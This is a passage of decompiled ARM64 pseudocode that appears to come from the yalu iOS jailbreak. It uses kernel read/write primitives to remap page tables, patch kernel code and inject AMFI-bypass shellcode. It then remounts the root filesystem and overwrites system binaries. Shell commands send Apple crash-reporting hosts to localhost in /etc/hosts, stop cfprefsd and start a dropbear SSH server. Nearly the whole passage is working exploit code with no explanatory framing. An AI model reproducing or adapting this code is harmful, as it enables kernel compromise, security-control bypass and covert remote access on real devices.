1192.             asm { sxtw       x12, w12 };
1193.             r0 = r10 + r12;
1194.             r8 = ((*(r31 + 0x1480) & 0xfffffffffffff000) - r9) + r8;
1195.             r9 = *(r31 + 0x147c) << 0x3;
1196.             asm { sxtw       x9, w9 };
1197.             *(r31 + 0x880) = r0;
1198.             *(r31 + 0x878) = _ReadAnywhere64();
1199.             *(r31 + 0x870) = _WriteAnywhere64();
1200.     }
1201.     r8 = *(r31 + 0x1480) & 0xfff;
1202.     *(r31 + 0x868) = r8;
1203.     *(r31 + 0x1480) = *(r31 + 0x868) | _findphys_real() & 0xfffffffffffff000;
1204.     r0 = *(r31 + 0x1490);
1205.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1206.     asm { sxtw       x8, w8 };
1207.     r0 = _WriteAnywhere64();
1208.     r1 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1209.     *(r31 + 0x860) = r0;
1210.     *(r31 + 0x858) = _WriteAnywhere64();
1211.     *(r31 + 0x1470) = _constget() + 0x10001e1b8;
1212.     *(r31 + 0x1468) = *(r31 + 0x1470) + 0xa78;
1213.     *(r31 + 0x1460) = *(r31 + 0x1468) - *(r31 + 0x1470);
1214.     *(r31 + 0x145c) = r31;
1215.     *(r31 + 0x1458) = r31;
1216.     while (sign_extend_64(*(r31 + 0x1458)) < *(r31 + 0x1460)) {
1217.             r8 = *(r31 + 0x1470) + sign_extend_64(*(r31 + 0x1458)) & 0xffffffffffffc000;
1218.             r9 = *(r31 + 0x17b0);
1219.             r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
1220.             asm { sxtw       x8, w8 };
1221.             *(r31 + 0x1450) = _ReadAnywhere64();
1222.             *(r31 + 0x1448) = _physalloc();
1223.             for (*(r31 + 0x1444) = r31; *(r31 + 0x1444) < 0x800; *(r31 + 0x1444) = *(r31 + 0x1444) + 0x1) {
1224.                     r8 = 0x10001e1d8;
1225.                     r9 = 0x10001e1d0;
1226.                     r10 = *(r31 + 0x1448);
1227.                     r12 = *(r31 + 0x1444) << 0x3;
1228.                     asm { sxtw       x12, w12 };
1229.                     r0 = r10 + r12;
1230.                     r8 = ((*(r31 + 0x1450) & 0xfffffffffffff000) - r9) + r8;
1231.                     r9 = *(r31 + 0x1444) << 0x3;
1232.                     asm { sxtw       x9, w9 };
1233.                     *(r31 + 0x850) = r0;
1234.                     *(r31 + 0x848) = _ReadAnywhere64();
1235.                     *(r31 + 0x840) = _WriteAnywhere64();
1236.             }
1237.             r8 = *(r31 + 0x1450) & 0xfff;
1238.             *(r31 + 0x838) = r8;
1239.             *(r31 + 0x1450) = *(r31 + 0x838) | _findphys_real() & 0xfffffffffffff000;
1240.             r0 = *(r31 + 0x17b0);
1241.             r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1242.             asm { sxtw       x8, w8 };
1243.             *(r31 + 0x830) = _WriteAnywhere64();
1244.             *(r31 + 0x1520) = _physalloc();
1245.             r0 = *(r31 + 0x1448);
1246.             r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1247.             asm { sxtw       x8, w8 };
1248.             *(r31 + 0x1438) = _ReadAnywhere64();
1249.             for (*(r31 + 0x1434) = r31; *(r31 + 0x1434) < 0x800; *(r31 + 0x1434) = *(r31 + 0x1434) + 0x1) {
1250.                     r8 = 0x10001e1d8;
1251.                     r9 = 0x10001e1d0;
1252.                     r10 = *(r31 + 0x1520);
1253.                     r12 = *(r31 + 0x1434) << 0x3;
1254.                     asm { sxtw       x12, w12 };
1255.                     r0 = r10 + r12;
1256.                     r8 = ((*(r31 + 0x1438) & 0xfffffffffffff000) - r9) + r8;
1257.                     r9 = *(r31 + 0x1434) << 0x3;
1258.                     asm { sxtw       x9, w9 };
1259.                     *(r31 + 0x828) = r0;
1260.                     *(r31 + 0x820) = _ReadAnywhere64();
1261.                     *(r31 + 0x818) = _WriteAnywhere64();
1262.             }
1263.             r8 = *(r31 + 0x1438) & 0xfff;
1264.             *(r31 + 0x810) = r8;
1265.             *(r31 + 0x1438) = *(r31 + 0x810) | _findphys_real() & 0xfffffffffffff000;
1266.             r0 = *(r31 + 0x1448);
1267.             r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1268.             asm { sxtw       x8, w8 };
1269.             r0 = _WriteAnywhere64();
1270.             r8 = r29 - 0x98;
1271.             r1 = *(r31 + 0x1520);
1272.             *(r31 + 0x145c) = *(r31 + 0x145c) + 0x1;
1273.             r30 = *(r31 + 0x145c);
1274.             asm { sxtw       x30, w30 };
1275.             *(r31 + 0x808) = r0;
1276.             *(r31 + 0x1458) = *(r31 + 0x1458) + 0x4;
1277.     }
1278.     *(r31 + 0x1428) = r31;
1279.     r0 = vm_allocate(*_mach_task_self_, r31 + 0x429, *(r31 + 0x1460) + 0x8, r31 | 0x1);
1280.     *(r31 + 0x1424) = r31;
1281.     *(r31 + 0x804) = r0;
1282.     while (*(r31 + 0x1424) < *(r31 + 0x145c)) {
1283.             r1 = r31 + 0x419;
1284.             r2 = r31 | 0x4000;
1285.             r8 = zero_extend_64(0x0);
1286.             r9 = zero_extend_64(0x0);
1287.             r10 = r31 + 0x415;
1288.             r11 = r31 | 0x2;
1289.             r12 = r29 - 0x98;
1290.             r13 = 0x10001e1b0;
1291.             r14 = *_mach_task_self_;
1292.             r15 = *(r31 + 0x1428);
1293.             r17 = *(r31 + 0x1424) << 0xe;
1294.             asm { sxtw       x17, w17 };
1295.             *(r31 + 0x1418) = r15 + r17;
1296.             *(r31 + 0x1414) = r31;
1297.             r31 = r10;
1298.             *(r31 + 0x8) = r10;
1299.             *(r31 + 0x10) = r11;
1300.             *(r31 + 0x800) = vm_remap(r14, r1, r2, r8, stack[2102], stack[2103], stack[2104], stack[2105], stack[2106], stack[2107], stack[2108]);
1301.             *(r31 + 0x1424) = *(r31 + 0x1424) + 0x1;
1302.     }
1303.     *(r31 + 0x1408) = *(r31 + 0x1428) + (*(r31 + 0x1470) & 0x3fff);
1304.     *(*(r31 + 0x1408) + 0x120) = zero_extend_64(0x0);
1305.     *(*(r31 + 0x1408) + 0x3c0) = zero_extend_64(0x0);
1306.     *(*(r31 + 0x1408) + 0x7e0) = zero_extend_64(0x0);
1307.     *(*(r31 + 0x1408) + 0x7f0) = zero_extend_64(0x0);
1308.     *(*(r31 + 0x1408) + 0x7f8) = zero_extend_64(0x0);
1309.     *(*(r31 + 0x1408) + 0x800) = zero_extend_64(0x0);
1310.     *(*(r31 + 0x1408) + 0x808) = zero_extend_64(0x0);
1311.     *(*(r31 + 0x1408) + 0x810) = zero_extend_64(0x0);
1312.     *(*(r31 + 0x1408) + 0x818) = zero_extend_64(0x0);
1313.     *(*(r31 + 0x1408) + 0x820) = zero_extend_64(0x0);
1314.     *(*(r31 + 0x1408) + 0x828) = zero_extend_64(0x0);
1315.     *(*(r31 + 0x1408) + 0x840) = zero_extend_64(0x0);
1316.     *(*(r31 + 0x1408) + 0x848) = zero_extend_64(0x0);
1317.     *(*(r31 + 0x1408) + 0x858) = zero_extend_64(0x0);
1318.     *(*(r31 + 0x1408) + 0x870) = zero_extend_64(0x0);
1319.     *(*(r31 + 0x1408) + 0x888) = zero_extend_64(0x0);
1320.     *(*(r31 + 0x1408) + 0x898) = zero_extend_64(0x0);
1321.     *(*(r31 + 0x1408) + 0x8a0) = zero_extend_64(0x0);
1322.     *(*(r31 + 0x1408) + 0x8a8) = zero_extend_64(0x0);
1323.     *(*(r31 + 0x1408) + 0x8b0) = zero_extend_64(0x0);
1324.     *(*(r31 + 0x1408) + 0x8b8) = zero_extend_64(0x0);
1325.     *(*(r31 + 0x1408) + 0x8c0) = zero_extend_64(0x0);
1326.     *(*(r31 + 0x1408) + 0x8c8) = zero_extend_64(0x0);
1327.     *(*(r31 + 0x1408) + 0x8d0) = zero_extend_64(0x0);
1328.     *(*(r31 + 0x1408) + 0x8d8) = zero_extend_64(0x0);
1329.     *(*(r31 + 0x1408) + 0x978) = zero_extend_64(0x0);
1330.     *(*(r31 + 0x1408) + 0x9e0) = zero_extend_64(0x0);
1331.     if (zero_extend_64(*(r31 + 0x17af)) == 0x0) goto loc_10001441c;
1332.  
1333. loc_100013dd4:
1334.     *(r31 + 0x1518) = _constget() + 0x10001e1b8;
1335.     *(r31 + 0x1404) = r31;
1336.     goto loc_100013df4;
1337.  
1338. loc_100013df4:
1339.     if (*(r31 + 0x1404) >= 0x10) goto loc_10001410c;
1340.  
1341. loc_100013e00:
1342.     r8 = *(r31 + 0x1518);
1343.     r10 = *(r31 + 0x1404) << 0x2;
1344.     asm { sxtw       x10, w10 };
1345.     if ((_ReadAnywhere32() & 0x7f000000) != zero_extend_64(0x3400)) goto loc_1000140fc;
1346.  
1347. loc_100013e2c:
1348.     r9 = *(r31 + 0x1518);
1349.     r11 = *(r31 + 0x1404) << 0x2;
1350.     asm { sxtw       x11, w11 };
1351.     r8 = r9 + r11 & 0xffffffffffffc000;
1352.     r9 = *(r31 + 0x17b0);
1353.     r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
1354.     asm { sxtw       x8, w8 };
1355.     *(r31 + 0x13f8) = _ReadAnywhere64();
1356.     *(r31 + 0x13f0) = _physalloc();
1357.     for (*(r31 + 0x13ec) = r31; *(r31 + 0x13ec) < 0x800; *(r31 + 0x13ec) = *(r31 + 0x13ec) + 0x1) {
1358.             r8 = 0x10001e1d8;
1359.             r9 = 0x10001e1d0;
1360.             r10 = *(r31 + 0x13f0);
1361.             r12 = *(r31 + 0x13ec) << 0x3;
1362.             asm { sxtw       x12, w12 };
1363.             r0 = r10 + r12;
1364.             r8 = ((*(r31 + 0x13f8) & 0xfffffffffffff000) - r9) + r8;
1365.             r9 = *(r31 + 0x13ec) << 0x3;
1366.             asm { sxtw       x9, w9 };
1367.             *(r31 + 0x7f8) = r0;
1368.             *(r31 + 0x7f0) = _ReadAnywhere64();
1369.             *(r31 + 0x7e8) = _WriteAnywhere64();
1370.     }
1371.     r8 = *(r31 + 0x13f8) & 0xfff;
1372.     *(r31 + 0x7e0) = r8;
1373.     *(r31 + 0x13f8) = *(r31 + 0x7e0) | _findphys_real() & 0xfffffffffffff000;
1374.     r0 = *(r31 + 0x17b0);
1375.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1376.     asm { sxtw       x8, w8 };
1377.     *(r31 + 0x7d8) = _WriteAnywhere64();
1378.     *(r31 + 0x1520) = _physalloc();
1379.     r0 = *(r31 + 0x13f0);
1380.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1381.     asm { sxtw       x8, w8 };
1382.     *(r31 + 0x13e0) = _ReadAnywhere64();
1383.     for (*(r31 + 0x13dc) = r31; *(r31 + 0x13dc) < 0x800; *(r31 + 0x13dc) = *(r31 + 0x13dc) + 0x1) {
1384.             r8 = 0x10001e1d8;
1385.             r9 = 0x10001e1d0;
1386.             r10 = *(r31 + 0x1520);
1387.             r12 = *(r31 + 0x13dc) << 0x3;
1388.             asm { sxtw       x12, w12 };
1389.             r0 = r10 + r12;
1390.             r8 = ((*(r31 + 0x13e0) & 0xfffffffffffff000) - r9) + r8;
1391.             r9 = *(r31 + 0x13dc) << 0x3;
1392.             asm { sxtw       x9, w9 };
1393.             *(r31 + 0x7d0) = r0;
1394.             *(r31 + 0x7c8) = _ReadAnywhere64();
1395.             *(r31 + 0x7c0) = _WriteAnywhere64();
1396.     }
1397.     r8 = *(r31 + 0x13e0) & 0xfff;
1398.     *(r31 + 0x7b8) = r8;
1399.     *(r31 + 0x13e0) = *(r31 + 0x7b8) | _findphys_real() & 0xfffffffffffff000;
1400.     r0 = *(r31 + 0x13f0);
1401.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1402.     asm { sxtw       x8, w8 };
1403.     r0 = _WriteAnywhere64();
1404.     r1 = zero_extend_64(0xd503);
1405.     asm { movk       w1, #0x201f };
1406.     r8 = *(r31 + 0x1520);
1407.     r30 = *(r31 + 0x1518);
1408.     r10 = *(r31 + 0x1404) << 0x2;
1409.     asm { sxtw       x10, w10 };
1410.     *(r31 + 0x7b0) = r0;
1411.     *(r31 + 0x7a8) = _WriteAnywhere32(r8 + (r30 + r10 & 0x3fff), r1);
1412.     goto loc_10001410c;
1413.  
1414. loc_10001410c:
1415.     *(r31 + 0x1518) = _constget() + 0x10001e1b8 - 0x18;
1416.     r30 = *(r31 + 0x1518) & 0xffffffffffffc000;
1417.     r8 = *(r31 + 0x17b0);
1418.     r0 = (r30 >> 0x19 & 0x7ff) << 0x3;
1419.     asm { sxtw       x0, w0 };
1420.     *(r31 + 0x13d0) = _ReadAnywhere64();
1421.     *(r31 + 0x13c8) = _physalloc();
1422.     for (*(r31 + 0x13c4) = r31; *(r31 + 0x13c4) < 0x800; *(r31 + 0x13c4) = *(r31 + 0x13c4) + 0x1) {
1423.             r8 = 0x10001e1d8;
1424.             r9 = 0x10001e1d0;
1425.             r10 = *(r31 + 0x13c8);
1426.             r12 = *(r31 + 0x13c4) << 0x3;
1427.             asm { sxtw       x12, w12 };
1428.             r0 = r10 + r12;
1429.             r8 = ((*(r31 + 0x13d0) & 0xfffffffffffff000) - r9) + r8;
1430.             r9 = *(r31 + 0x13c4) << 0x3;
1431.             asm { sxtw       x9, w9 };
1432.             *(r31 + 0x7a0) = r0;
1433.             *(r31 + 0x798) = _ReadAnywhere64();
1434.             *(r31 + 0x790) = _WriteAnywhere64();
1435.     }
1436.     r8 = *(r31 + 0x13d0) & 0xfff;
1437.     *(r31 + 0x788) = r8;
1438.     *(r31 + 0x13d0) = *(r31 + 0x788) | _findphys_real() & 0xfffffffffffff000;
1439.     r0 = *(r31 + 0x17b0);
1440.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
1441.     asm { sxtw       x8, w8 };
1442.     *(r31 + 0x780) = _WriteAnywhere64();
1443.     *(r31 + 0x1520) = _physalloc();
1444.     r0 = *(r31 + 0x13c8);
1445.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1446.     asm { sxtw       x8, w8 };
1447.     *(r31 + 0x13b8) = _ReadAnywhere64();
1448.     for (*(r31 + 0x13b4) = r31; *(r31 + 0x13b4) < 0x800; *(r31 + 0x13b4) = *(r31 + 0x13b4) + 0x1) {
1449.             r8 = 0x10001e1d8;
1450.             r9 = 0x10001e1d0;
1451.             r10 = *(r31 + 0x1520);
1452.             r12 = *(r31 + 0x13b4) << 0x3;
1453.             asm { sxtw       x12, w12 };
1454.             r0 = r10 + r12;
1455.             r8 = ((*(r31 + 0x13b8) & 0xfffffffffffff000) - r9) + r8;
1456.             r9 = *(r31 + 0x13b4) << 0x3;
1457.             asm { sxtw       x9, w9 };
1458.             *(r31 + 0x778) = r0;
1459.             *(r31 + 0x770) = _ReadAnywhere64();
1460.             *(r31 + 0x768) = _WriteAnywhere64();
1461.     }
1462.     r8 = *(r31 + 0x13b8) & 0xfff;
1463.     *(r31 + 0x760) = r8;
1464.     *(r31 + 0x13b8) = *(r31 + 0x760) | _findphys_real() & 0xfffffffffffff000;
1465.     r0 = *(r31 + 0x13c8);
1466.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
1467.     asm { sxtw       x8, w8 };
1468.     r0 = _WriteAnywhere64();
1469.     r1 = zero_extend_64(0x5800);
1470.     asm { movk       w1, #0x41 };
1471.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1472.     *(r31 + 0x758) = r0;
1473.     r0 = _WriteAnywhere32(r8, r1);
1474.     r1 = zero_extend_64(0xd61f);
1475.     asm { movk       w1, #0x20 };
1476.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1477.     *(r31 + 0x750) = r0;
1478.     r0 = _WriteAnywhere32(r8 + 0x4, r1);
1479.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
1480.     *(r31 + 0x748) = r0;
1481.     *(r31 + 0x740) = _WriteAnywhere64();
1482.     goto loc_100016468;
1483.  
1484. loc_100016468:
1485.     NSLog(@"enabling patches");
1486.     r1 = *(r31 + 0x17c8);
1487.     *(r31 + 0x130) = _WriteAnywhere64();
1488.     do {
1489.             r0 = _constget();
1490.             if (_ReadAnywhere32() == 0x1) {
1491.                 break;
1492.             }
1493.             *(r31 + 0x12c) = sleep(r31 | 0x1);
1494.     } while (true);
1495.     NSLog(@"patches enabled");
1496.     r0 = _constget();
1497.     *(r31 + 0x12a0) = _ReadAnywhere64();
1498.     r0 = uname(r31 + 0xa79);
1499.     *(r31 + 0x1298) = zero_extend_64(0xd8);
1500.     *(r31 + 0x128) = r0;
1501.     if (strstr(r31 + 0xd79, "16.0.0") != 0x0) {
1502.             *(r31 + 0x1298) = zero_extend_64(0xd0);
1503.     }
1504.     r0 = _ReadAnywhere64();
1505.     *(r31 + 0x1290) = r0;
1506.     r0 = _ReadAnywhere32();
1507.     *(r31 + 0x128c) = r0;
1508.     *(r31 + 0x120) = _WriteAnywhere32(*(r31 + 0x1290) + 0x71, r0 & 0xffffffffffffffbf);
1509.     *(r31 + 0x1280) = strdup("/dev/disk0s1s1");
1510.     *(r31 + 0x127c) = mount("hfs", "/", r31 | 0x10000, r31 + 0x281);
1511.     NSLog(@"remounting: %d", r1);
1512.     r0 = _ReadAnywhere64();
1513.     *(r31 + 0x1290) = r0;
1514.     r0 = _WriteAnywhere32(r0 + 0x71, *(r31 + 0x128c));
1515.     *(r31 + 0x1278) = r31 | 0x100;
1516.     *(r31 + 0x118) = r0;
1517.     *(r31 + 0x110) = r31 + 0x979;
1518.     *(r31 + 0x10c) = _NSGetExecutablePath();
1519.     r1 = zero_extend_64(0x0);
1520.     *(r31 + 0x100) = zero_extend_64(0x0);
1521.     *(r31 + 0x1270) = realpath$DARWIN_EXTSN();
1522.     *(r31 + 0x1250) = *(r31 + 0x100);
1523.     *(r31 + 0x1258) = r31 + 0x251;
1524.     *(r31 + 0x1260) = r31 | 0x20000000;
1525.     *(r31 + 0x1264) = r31 | 0x20;
1526.     *(r31 + 0x1268) = zero_extend_64(0x0);
1527.     *(r31 + 0xf8) = objc_msgSend(*objc_cls_ref_NSString, *0x10001db48);
1528.     *(r31 + 0xf0) = objc_msgSend(*(r31 + 0xf8), *0x10001db50);
1529.     *(r31 + 0x1248) = *(r31 + 0xf0);
1530.     *(r31 + 0xec) = open("/.installed_yaluX", zero_extend_64(0x0));
1531.     *(r31 + 0x1244) = *(r31 + 0xec);
1532.     if (*(r31 + 0x1244) == -0x1) {
1533.             *(r31 + 0xe0) = objc_msgSend(*(r31 + 0x1248), *0x10001db58);
1534.             *(r31 + 0x1238) = *(r31 + 0xe0);
1535.             *(r31 + 0xd8) = objc_msgSend(*(r31 + 0x1248), *0x10001db58);
1536.             *(r31 + 0x1230) = *(r31 + 0xd8);
1537.             *(r31 + 0xd0) = objc_msgSend(*(r31 + 0x1238), *0x10001db60);
1538.             *(r31 + 0x1228) = *(r31 + 0xd0);
1539.             *(r31 + 0xcc) = unlink("/bin/tar");
1540.             *(r31 + 0xc8) = unlink("/bin/launchctl");
1541.             *(r31 + 0xc4) = copyfile(*(r31 + 0x1228), "/bin/tar", zero_extend_64(0x0), r31 | 0xf);
1542.             *(r31 + 0xc0) = chmod("/bin/tar", r31 | 0x1ff);
1543.             *(r31 + 0x1228) = "/bin/tar";
1544.             *(r31 + 0xbc) = chdir("/");
1545.             r8 = *(r31 + 0x1258) + 0x18;
1546.             *(r31 + 0x1950) = *(r31 + 0x1228);
1547.             *(r31 + 0x1958) = "--preserve-permissions";
1548.             *(r31 + 0x1960) = "-xvf";
1549.             *(r31 + 0xb0) = *(r31 + 0x1228);
1550.             *(r31 + 0xa8) = r8;
1551.             *(r31 + 0xa0) = r31 + 0x969;
1552.             *(r31 + 0x98) = objc_msgSend(*(r31 + 0x1230), *0x10001db60);
1553.             *(*(r31 + 0x98) + 0x8) = zero_extend_64(0x0);
1554.             *(r31 + 0x94) = posix_spawn(*(r31 + 0xa8), *(r31 + 0xb0), zero_extend_64(0x0), zero_extend_64(0x0), stack[2048], stack[2049]);
1555.             NSLog(@"pid = %x", r1);
1556.             *(r31 + 0x90) = zero_extend_64(0x0);
1557.             *(r31 + 0x8c) = waitpid(*(*(r31 + 0x1258) + 0x18), zero_extend_64(0x0), *(r31 + 0x90));
1558.             *(r31 + 0x80) = objc_msgSend(*(r31 + 0x1248), *0x10001db58);
1559.             *(r31 + 0x1220) = *(r31 + 0x80);
1560.             *(r31 + 0x78) = objc_msgSend(*(r31 + 0x80), *0x10001db60);
1561.             *(r31 + 0x1228) = *(r31 + 0x78);
1562.             *(r31 + 0x70) = zero_extend_64(0x0);
1563.             *(r31 + 0x6c) = copyfile(*(r31 + 0x78), "/bin/launchctl", *(r31 + 0x70), r31 | 0xf);
1564.             *(r31 + 0x68) = chmod("/bin/launchctl", zero_extend_64(0x1ed));
1565.             *(r31 + 0x64) = open("/.installed_yaluX", zero_extend_64(0x202));
1566.             *(r31 + 0x60) = open("/.cydia_no_stash", zero_extend_64(0x202));
1567.             *(r31 + 0x5c) = system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts");
1568.             *(r31 + 0x58) = system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts");
1569.             *(r31 + 0x54) = system("/usr/bin/uicache");
1570.             *(r31 + 0x50) = system("killall -SIGSTOP cfprefsd");
1571.             *(r31 + 0x48) = objc_msgSend(*objc_cls_ref_NSMutableDictionary, *0x10001db68);
1572.             *(r31 + 0x40) = objc_msgSend(*(r31 + 0x48), *0x10001db70);
1573.             *(r31 + 0x1218) = *(r31 + 0x40);
1574.             *(r31 + 0x38) = *(r31 + 0x40);
1575.             *(r31 + 0x30) = objc_msgSend(*objc_cls_ref_NSNumber, *0x10001db78);
1576.             objc_msgSend(*(r31 + 0x38), *0x10001db80);
1577.             *(r31 + 0x2c) = objc_msgSend(*(r31 + 0x1218), *0x10001db88);
1578.     }
1579.     _Block_object_dispose();
1580.     r0 = system("echo 'really jailbroken'; (sleep 1; /bin/launchctl load /Library/LaunchDaemons/dropbear.plist)&");
1581.     r8 = *(r31 + 0x18c8) + 0x100;
1582.     *(r31 + 0x28) = r0;
1583.     r0 = _WriteAnywhere64();
1584.     *(r31 + 0x11f0) = *__NSConcreteStackBlock;
1585.     *(r31 + 0x11f8) = r31 | 0xffffffffc0000000;
1586.     *(r31 + 0x11fc) = r31;
1587.     *(r31 + 0x1200) = 0x100017140;
1588.     *(r31 + 0x1208) = 0x10001c6d0;
1589.     *(r31 + 0x1210) = *(r31 + 0x1948);
1590.     *(r31 + 0x20) = r0;
1591.     dispatch_async(*__dispatch_main_q, r31 + 0x1f1);
1592.     r0 = _constget();
1593.     _ReadAnywhere64();
1594.     NSLog(@"%x", *(r31 + 0x1888));
1595.     r0 = sleep(r31 | 0x2);
1596.     *(r31 + 0x11c8) = *__NSConcreteStackBlock;
1597.     *(r31 + 0x11d0) = r31 | 0xffffffffc0000000;
1598.     *(r31 + 0x11d4) = r31;
1599.     *(r31 + 0x11d8) = 0x100017188;
1600.     *(r31 + 0x11e0) = 0x10001c6f0;
1601.     *(r31 + 0x11e8) = *(r31 + 0x1948);
1602.     *(r31 + 0x1c) = r0;
1603.     r0 = dispatch_async(*__dispatch_main_q, r31 + 0x1c9);
1604.     goto loc_100016b8c;
1605.  
1606. loc_1000140fc:
1607.     *(r31 + 0x1404) = *(r31 + 0x1404) + 0x1;
1608.     goto loc_100013df4;
1609.  
1610. loc_10001441c:
1611.     r0 = NSLog(@"amfi shellcode... rip!");
1612.     r1 = r31 | 0x1;
1613.     asm { movn       x0, #0xf };
1614.     asm { movk       x0, #0x75f };
1615.     asm { movk       x0, #0x53cc };
1616.     *(r31 + 0x738) = _WriteAnywhere32(0x10001e1b8 + r0, r1);
1617.     *(r31 + 0x13a8) = _physalloc();
1618.     *(r31 + 0x13a0) = _physalloc();
1619.     *(r31 + 0x1398) = _constget() & 0x3fff;
1620.     *(r31 + 0x730) = _constget() & 0xffffffffffffc000;
1621.     *(r31 + 0x1390) = *(r31 + 0x730) - (_constget() & 0xffffffffffffc000);
1622.     *(r31 + 0x1388) = _physalloc();
1623.     *(r31 + 0x1380) = *(r31 + 0x1388) + *(r31 + 0x1390);
1624.     NSLog(@"reloff %llx", r1);
1625.     *(r31 + 0x1378) = _constget() & 0x3fff;
1626.     *(r31 + 0x1370) = *(r31 + 0x1380) + *(r31 + 0x1378);
1627.     *(r31 + 0x1378) = _constget() & 0x3fff;
1628.     r0 = _WriteAnywhere64();
1629.     r1 = *(r31 + 0x1380) + *(r31 + 0x1378);
1630.     *(r31 + 0x728) = r0;
1631.     *(r31 + 0x720) = r1;
1632.     _constget() + 0x10001e1b8;
1633.     r0 = _WriteAnywhere64();
1634.     *(r31 + 0x136c) = r31;
1635.     *(r31 + 0x718) = r0;
1636.     while (*(r31 + 0x136c) < 0x20) {
1637.             r8 = zero_extend_64(0x120);
1638.             r9 = *(r31 + 0x13a8);
1639.             r11 = *(r31 + 0x136c) << 0x3;
1640.             asm { sxtw       x11, w11 };
1641.             r9 = *(r31 + 0x13a0);
1642.             r11 = *(r31 + 0x136c) * r8;
1643.             asm { sxtw       x11, w11 };
1644.             r0 = _WriteAnywhere64();
1645.             r8 = zero_extend_64(0x13);
1646.             r9 = *(r31 + 0x13a0);
1647.             r11 = *(r31 + 0x136c) * zero_extend_64(0x120);
1648.             asm { sxtw       x11, w11 };
1649.             *(r31 + 0x710) = r0;
1650.             *(r31 + 0x708) = 0xc8 + r9 + r11;
1651.             _constget() + 0x10001e1b8;
1652.             r0 = _WriteAnywhere64();
1653.             r8 = zero_extend_64(0x14);
1654.             r9 = *(r31 + 0x13a0);
1655.             r11 = *(r31 + 0x136c) * zero_extend_64(0x120);
1656.             asm { sxtw       x11, w11 };
1657.             *(r31 + 0x700) = r0;
1658.             *(r31 + 0x6f8) = 0x110 + r9 + r11;
1659.             _constget() + 0x10001e1c0;
1660.             r0 = _WriteAnywhere64();
1661.             r8 = zero_extend_64(0x12);
1662.             r9 = *(r31 + 0x13a0);
1663.             r11 = *(r31 + 0x136c) * zero_extend_64(0x120);
1664.             asm { sxtw       x11, w11 };
1665.             *(r31 + 0x6f0) = r0;
1666.             *(r31 + 0x6e8) = 0xa0 + r9 + r11;
1667.             _constget() + 0x10001e1b8;
1668.             r0 = _WriteAnywhere64();
1669.             r9 = *(r31 + 0x13a0);
1670.             r11 = *(r31 + 0x136c) * zero_extend_64(0x120);
1671.             asm { sxtw       x11, w11 };
1672.             r9 = 0x30 + r9 + r11;
1673.             r11 = *(r31 + 0x13a8);
1674.             r1 = *(r31 + 0x136c) + 0x1 << 0x3;
1675.             asm { sxtw       x1, w1 };
1676.             *(r31 + 0x6e0) = r0;
1677.             *(r31 + 0x6d8) = _WriteAnywhere64();
1678.             *(r31 + 0x136c) = *(r31 + 0x136c) + 0x1;
1679.     }
1680.     *(r31 + 0x1360) = _physalloc();
1681.     *(r31 + 0x1360) = *(r31 + 0x1360) + 0x44;
1682.     r0 = *(r31 + 0x13a0) + zero_extend_64(0x22e0);
1683.     *(r31 + 0x6d0) = _WriteAnywhere64();
1684.     *(r31 + 0x6c8) = _WriteAnywhere64();
1685.     *(r31 + 0x1358) = _physalloc();
1686.     *(r31 + 0x1350) = _physalloc();
1687.     *(r31 + 0x6c0) = *(r31 + 0x1360) + 0xc8;
1688.     _constget() + 0x10001e1b8;
1689.     r0 = _WriteAnywhere64();
1690.     r1 = *(r31 + 0x1360) + 0x28;
1691.     *(r31 + 0x6b8) = r0;
1692.     *(r31 + 0x6b0) = r1;
1693.     _constget() + 0x10001e1b8;
1694.     r0 = _WriteAnywhere64();
1695.     r1 = *(r31 + 0x1360) + 0x20;
1696.     r30 = *(r31 + 0x1360) + 0x100;
1697.     *(r31 + 0x6a8) = r0;
1698.     r0 = _WriteAnywhere64();
1699.     r1 = *(r31 + 0x1360) + 0x100;
1700.     r30 = *(r31 + 0x1360) + 0x100;
1701.     *(r31 + 0x6a0) = r0;
1702.     r0 = _WriteAnywhere64();
1703.     r1 = *(r31 + 0x1360) + 0x30;
1704.     r30 = *(r31 + 0x1358) + 0x8;
1705.     *(r31 + 0x698) = r0;
1706.     r0 = _WriteAnywhere64();
1707.     r30 = *(r31 + 0x1360) + 0x10;
1708.     *(r31 + 0x690) = r0;
1709.     r0 = _WriteAnywhere64();
1710.     asm { movk       x1, #0x4141 };
1711.     r30 = *(r31 + 0x1360) + 0x18;
1712.     *(r31 + 0x688) = r0;
1713.     r0 = _WriteAnywhere64();
1714.     r1 = *(r31 + 0x1360) + 0x100;
1715.     *(r31 + 0x680) = r0;
1716.     *(r31 + 0x678) = r1 + 0x78;
1717.     _constget() + 0x10001e1b8;
1718.     r0 = _WriteAnywhere64();
1719.     r1 = *(r31 + 0x1360) + 0x110;
1720.     *(r31 + 0x670) = r0;
1721.     *(r31 + 0x668) = r1;
1722.     _constget() + 0x10001e1bc;
1723.     r0 = _WriteAnywhere64();
1724.     *(r31 + 0x134c) = r31;
1725.     *(r31 + 0x660) = r0;
1726.     while (*(r31 + 0x134c) < 0x800) {
1727.             r8 = *(r31 + 0x1358);
1728.             r10 = *(r31 + 0x134c) << 0x3;
1729.             asm { sxtw       x10, w10 };
1730.             *(r31 + 0x658) = r8 + r10;
1731.             _constget() + 0x10001e1b8;
1732.             *(r31 + 0x650) = _WriteAnywhere64();
1733.             *(r31 + 0x134c) = *(r31 + 0x134c) + 0x1;
1734.     }
1735.     *(r31 + 0x1340) = r31;
1736.     r0 = _WriteAnywhere64();
1737.     r8 = *(r31 + 0x1350) + 0x8;
1738.     *(r31 + 0x648) = r0;
